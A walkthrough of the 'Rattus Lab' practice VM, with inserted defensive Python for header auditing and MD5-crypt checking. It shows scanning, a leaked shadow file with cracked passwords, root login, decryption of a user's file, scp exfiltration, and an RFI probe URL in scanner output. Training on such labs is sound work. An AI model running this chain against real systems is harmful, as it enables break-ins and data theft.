Rattus Lab:
After configuring the network settings on each VM, we scan the network to find the IP address of the 'server':
- the 'netdiscover' command will show the IP addresses discovered on the configured network. In our case 10.8.7.2/29 was the IP address of the 'server', and for our Kali box it was 10.8.7.4/29 (the first IP address available on the network).
Note: I had to create a VMnet3 network (under the Virtual Network Editor) and assign it the network address 10.8.7.0/29. I configured my VM workstation's IP address under VMnet3 and ran 'netdiscover'.
The 'server':
root@kali: # nmap -sT -p- -T4 10.8.7.2
Nmap scan report for 10.8.7.2
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
113/tcp open ident
139/tcp open netbios-ssn
445/tcp open microsoft-ds
I also wanted to scan for UDP ports, so I ran the command above modified accordingly...but it was going to take forever, so I stopped it!
Upon checking what's running on port 80, we find, based on the e-mail addresses, some potential usernames we can use for brute forcing: tskies@rattus.lab, jsummer@rattus.lab, mhog@rattus.lab.
Respectively:
tskies
jsummer
mhog
More testing of port 80 with nikto and dirbuster:
Nikto:
root@kali: # nikto -h http://10.8.7.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.8.7.2
+ Target Hostname: 10.8.7.2
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/1.3.31 (Unix) PHP/4.4.4
+ Server leaks inodes via ETags, header found with file /, inode: 20914, size: 3001, mtime: Fri Feb 18 03:33:59 2011
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ PHP/4.4.4 appears to be outdated (current is at least 5.4.26)
+ Apache/1.3.31 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'CONNECT' may allow server to proxy client requests.
+ HTTP method: 'PATCH' may allow client to issue patch commands to server. See RFC-5789.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed as allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/4.4.4
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7355 requests: 0 error(s) and 22 item(s) reported on remote host
---------------------------------------------------------------------------
+ 1 host(s) tested
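The Nikto findings above boil down to a handful of header checks that a defender can re-run from a single OPTIONS response. The following is an added example, not part of the original write-up and not Nikto's code: it parses a constructed OPTIONS response modelled on the headers Nikto reported for this host (the Allow list, Server and X-Powered-By values are the ones on the page; the status line and Content-Length are assumed) and flags the same classes of problem (TRACE, write and WebDAV methods, CONNECT, missing X-Frame-Options, end-of-life Apache 1.x, version disclosure). A second, hardened response is included to show what a clean result looks like.

```python
import re

# Constructed OPTIONS response; the Allow/Server/X-Powered-By values mirror the
# Nikto output for 10.8.7.2, the rest of the response is assumed for the example.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache/1.3.31 (Unix) PHP/4.4.4
X-Powered-By: PHP/4.4.4
Allow: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
Content-Length: 0
"""

# Constructed response from a host with a minimal method set and version hidden.
HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache
Allow: GET, HEAD, POST, OPTIONS
X-Frame-Options: DENY
Content-Length: 0
"""

WRITE_METHODS = {"PUT", "DELETE", "PATCH", "MOVE", "COPY"}
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "COPY", "MOVE"}


def parse_response(raw):
    """Split a raw HTTP response into (status line, {lower-case header: value})."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def allowed_methods(headers):
    """Set of methods advertised in the Allow header (empty if none)."""
    return {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}


def audit(raw):
    """Return {finding_code: detail} for the risky configuration visible in the headers."""
    _, headers = parse_response(raw)
    methods = allowed_methods(headers)
    findings = {}
    if "TRACE" in methods:
        findings["trace"] = "TRACE enabled: cross-site tracing (XST) risk"
    write = sorted(methods & WRITE_METHODS)
    if write:
        findings["write_methods"] = write
    if "CONNECT" in methods:
        findings["connect"] = "CONNECT allowed: server may be usable as a proxy"
    dav = sorted(methods & WEBDAV_METHODS)
    if dav:
        findings["webdav"] = dav
    if "x-frame-options" not in headers:
        findings["no_x_frame_options"] = "anti-clickjacking header missing"
    server = headers.get("server", "")
    m = re.match(r"Apache/(\d+)\.(\d+)", server)
    if m and int(m.group(1)) < 2:
        findings["eol_apache"] = f"Apache 1.x is end-of-life: {server}"
    if "x-powered-by" in headers:
        findings["x_powered_by"] = f"version disclosure: {headers['x-powered-by']}"
    return findings


if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(name, audit(raw))
```

The constructed "hardened" response deliberately strips the version from Server, drops X-Powered-By, limits Allow to the four methods a static site needs and sets X-Frame-Options, so the audit returns no findings for it; the same parser run against a real OPTIONS reply captured with curl or a proxy gives the defender a quick checklist before reaching for Nikto.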
Dirbuster:
root@kali: # dirb http://10.8.7.2
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://10.8.7.2/ ----
==> DIRECTORY: http://10.8.7.2/Images/
+ http://10.8.7.2/cgi-bin/ (CODE:403|SIZE:274)
+ http://10.8.7.2/garbage (CODE:200|SIZE:288)
+ http://10.8.7.2/index (CODE:200|SIZE:3001)
+ http://10.8.7.2/index.html (CODE:200|SIZE:3001)
+ http://10.8.7.2/info (CODE:200|SIZE:37710)
+ http://10.8.7.2/info.php (CODE:200|SIZE:37490)
+ http://10.8.7.2/status (CODE:200|SIZE:2456)
+ http://10.8.7.2/~operator (CODE:403|SIZE:275)
+ http://10.8.7.2/~root (CODE:403|SIZE:271)
-----------------
DOWNLOADED: 4592 - FOUND: 9
Browsing the found directories, we stumble upon this:
http://10.8.7.2/garbage
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
Attempting to crack the MD5 hashed passwords online....no luck!
We will try j0hn, the password cracker, with the famous rockyou.txt password file...
root@kali: /Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt loophole
Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
nostradamus (tskies)
albatros (root)
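The file served at /garbage is a copy of /etc/shadow, and the "FreeBSD MD5" format john reports is the salted, 1000-round MD5-crypt scheme whose hashes start with $1$. The following added example (not from the write-up, and not john's code) parses the leaked entries, separates locked accounts (!!) from ones with a real hash, and checks a candidate password the way a login would, by recomputing MD5-crypt with the stored salt and comparing in constant time. The shadow lines are copied from the page; the password "nostradamus" is the one john reported for tskies.

```python
import hashlib
import hmac

# Copy of the shadow-style entries leaked via http://10.8.7.2/garbage (from the page).
SHADOW_DUMP = """\
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
sshd:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
"""

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: least significant 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password, salt):
    """MD5-crypt ($1$) as implemented in FreeBSD's crypt-md5.c (salt is at most 8 chars)."""
    pw, sl, magic = password.encode(), salt.encode()[:8], b"$1$"
    ctx = hashlib.md5(pw + magic + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    pl = len(pw)
    while pl > 0:                       # mix in len(pw) bytes of the alternate digest
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                            # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):               # the 1000 stretching rounds
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    encoded = b"".join([
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4),
        _to64((final[1] << 16) | (final[7] << 8) | final[13], 4),
        _to64((final[2] << 16) | (final[8] << 8) | final[14], 4),
        _to64((final[3] << 16) | (final[9] << 8) | final[15], 4),
        _to64((final[4] << 16) | (final[10] << 8) | final[5], 4),
        _to64(final[11], 2),
    ])
    return (magic + sl + b"$" + encoded).decode()


def parse_shadow(text):
    """Map user -> password field for every non-empty shadow line."""
    entries = {}
    for line in text.splitlines():
        if line.strip():
            fields = line.split(":")
            entries[fields[0]] = fields[1]
    return entries


def classify(hash_field):
    """Coarse label useful for a password-policy audit of a shadow file."""
    if hash_field in ("", "!", "!!", "*", "x"):
        return "locked"
    if hash_field.startswith("$1$"):
        return "md5crypt"          # legacy; flag for rehashing with a modern scheme
    if hash_field.startswith("$6$"):
        return "sha512crypt"
    return "other"


def verify_password(candidate, hash_field):
    """True only if candidate reproduces an MD5-crypt hash_field; constant-time compare."""
    parts = hash_field.split("$")       # ['', '1', salt, hash]
    if len(parts) != 4 or parts[1] != "1":
        return False
    return hmac.compare_digest(md5crypt(candidate, parts[2]), hash_field)


if __name__ == "__main__":
    for user, field in parse_shadow(SHADOW_DUMP).items():
        print(f"{user:8} {classify(field)}")
```

The audit angle is the point: any $1$ entry should be rehashed under a modern scheme, and a shadow copy reachable over HTTP is a finding regardless of how strong the hashes are.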
We log on as root, to see if it's possible... and it is! :)
We browse through the /home directories and find an .enc encrypted file.
Maybe the .bash_history file will provide us with some clues... and it does...
Below is the command used to encrypt the file:
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
We reverse the encryption, to see if we can view the file:
openssl enc -aes-256-cbc -d -in Private.doc.enc -out Private.doc -pass pass:nostradamus
And we download the Private.doc file onto our Kali box:
root@kali: /Desktop# scp root@10.8.7.2:/root/Private.doc /root/Desktop/
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the system you must use valid credentials.
===========================================================
root@10.8.7.2's password:
Private.doc 100%
It seems to be some engineering science documentation!
The end ....